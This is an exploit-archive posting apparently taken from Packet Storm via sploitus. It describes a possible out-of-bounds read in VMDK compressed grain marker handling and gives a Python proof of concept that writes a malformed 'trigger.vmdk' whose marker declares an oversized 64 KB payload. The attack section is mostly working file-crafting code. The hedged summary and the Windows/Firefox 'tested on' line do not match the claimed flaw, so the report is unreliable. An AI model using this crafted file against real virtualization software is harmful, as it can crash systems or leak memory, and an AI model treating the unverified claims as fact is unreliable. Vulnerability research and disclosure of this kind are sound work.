Share
## https://sploitus.com/exploit?id=PACKETSTORM:216123
=============================================================================================================================================
    | # Title     : Improper Bounds Validation in VMDK Grain Marker Handling Leading to Potential Out-of-Bounds Read                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : No standalone download available                                                                                            |
    =============================================================================================================================================
    
    [+] Summary    : A flaw may exist in the handling of compressed grain markers within the VMDK monolithicSparse format. 
                     If the size field in a grain marker is not properly validated against the remaining cluster boundary (excluding the marker header size), 
    				 the decompression routine may process more data than safely available. This can potentially result in an out-of-bounds read condition due to improper bounds checking.
                     The issue stems from failing to ensure that the declared compressed data size does not exceed the actual buffer space after accounting for 
    				 the marker structure. Proper validation of marker size, boundary checks, and strict decompression limits are required to prevent memory safety violations.
    
    [+] POC   : 
    
    import struct
    
    def create_malicious_vmdk(filename):
    
        magic = b"KDMV"
        version = struct.pack("<I", 1)
        flags = struct.pack("<I", 3) # VMDK4_COMPRESSION_MARKER
        capacity = struct.pack("<Q", 2048) 
        granularity = struct.pack("<Q", 128) 
        desc_offset = struct.pack("<Q", 1)
        desc_size = struct.pack("<Q", 1)
        rg_size = struct.pack("<I", 1)
        gd_offset = struct.pack("<Q", 0) 
    
        header = magic + version + flags + capacity + granularity + \
                 desc_offset + desc_size + rg_size + gd_offset
        header = header.ljust(512, b'\x00')
    
        lba = struct.pack("<Q", 0)
    
        malicious_size = 64 * 1024 
        size = struct.pack("<I", malicious_size)
        
        marker = lba + size
        
        data = b"\x78\x9c\x03\x00\x00\x00\x00\x01" 
        data = data.ljust(malicious_size, b'\x41')
    
        with open(filename, "wb") as f:
            f.write(header)
            f.write(marker)
            f.write(data)
    
        print(f"[*] Created malicious file: {filename}")
        print(f"[*] Marker size set to: {malicious_size} bytes")
    
    if __name__ == "__main__":
        create_malicious_vmdk("trigger.vmdk")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================